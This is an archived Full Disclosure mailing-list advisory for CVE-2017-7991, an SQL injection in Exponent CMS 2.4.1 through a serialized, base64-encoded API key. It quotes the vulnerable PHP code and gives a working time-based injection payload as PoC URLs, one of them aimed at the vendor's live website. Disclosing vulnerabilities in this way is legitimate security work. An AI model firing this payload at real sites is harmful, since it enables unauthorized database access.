lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Fri, 21 Apr 2017 14:14:38 +0800
From: "404 Not Found" <root@...notfound.org>
To: "fulldisclosure" <fulldisclosure@...lists.org>
Subject: [FD] CVE-2017-7991-SQL injection-Exponent CMS

CVE-2017-7991-SQL injection-Exponent CMS

[Suggested description]
> Exponent CMS 2.4.1 and earlier has SQL injection  via a base64
> serialized API key (apikey parameter) in the api function  of
> framework/modules/eaas/controllers/eaasController.php.
>  
> ------------------------------------------
> 
> [Additional  Information]
> Vulnerable file is:  /framework/modules/eaas/controllers/eaasController.php
> Vulnerable  function is api.
> 
> public function api() {
>         if  (empty($this->params['apikey'])) {
>             $_REQUEST['apikey'] =  true;  // set this to force an ajax reply
>             $ar = new  expAjaxReply(550, 'Permission Denied', 'You need an API key in order to access  Exponent as a Service', null);
>             $ar->send();  //FIXME this  doesn't seem to work correctly in this scenario
>         } else  {
>             echo $this->params['apikey'];
>             $key  =  expUnserialize(base64_decode(urldecode($this->params['apikey'])));
>              echo $key;
>             
>             $cfg = new  expConfig($key);
>             $this->config =  $cfg->config;
>             if(empty($cfg->id))  {
>                 $ar = new expAjaxReply(550, 'Permission Denied',  'Incorrect API key or Exponent as a Service module configuration missing',  null);
>                 $ar->send();
>             } else  {
>                 if (!empty($this->params['get']))  {
>                     $this->handleRequest();
>                  } else {
>                     $ar = new expAjaxReply(200, 'ok', 'Your API  key is working, no data requested', null);
>                      $ar->send();
>                 }
>             }
>          }
>     }
> 
> We can control param $apikey by using  base64_encode and serialize
> functions to encrypt the SQL injection  string. Then, the $apikey will
> be decrypted and cause SQL injection.  Such as, if we want to use
> "aaa\'or sleep(2)#" to inject, we should use  "echo
> base64_encode(serialize($apikey));" to encrypt the Attack  string:
> czoxNjoiYWFhJ29yIHNsZWVwKDIpIyI7 is the result. So,
> http://localhost:88/exponent/index.php?module=eaas&action=api&apikey=czoxNjoiYWFhJ29yIHNsZWVwKDIpIyI7
>  is the PoC. The result is: the site will sleep several seconds, and
> you  can see SQL injection is successful in MySQL logs.
> 
>  ------------------------------------------
> 
> [Vulnerability  Type]
> SQL Injection
> 
>  ------------------------------------------
> 
> [Vendor of  Product]
> Exponent CMS
> 
>  ------------------------------------------
> 
> [Affected Product  Code Base]
> Exponent CMS - 2.4.1 and earlier
> 
>  ------------------------------------------
> 
> [Affected  Component]
>  \framework\modules\eaas\controllers\eaasController.php,function api(),param  $apikey
> 
> ------------------------------------------
>  
> [Attack Type]
> Remote
> 
>  ------------------------------------------
> 
> [Impact Information  Disclosure]
> true
> 
>  ------------------------------------------
> 
> [Attack  Vectors]
> http://localhost:88/exponent/index.php?module=eaas&action=api&apikey=czoxNjoiYWFhJ29yIHNsZWVwKDIpIyI7
>  
> http://www.exponentcms.org/index.php?module=eaas&action=api&apikey=czoxNjoiYWFhJ29yIHNsZWVwKDIpIyI7
>  
> ------------------------------------------
> 
>  [Discoverer]
> 404notfound

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux - Powered by OpenVZ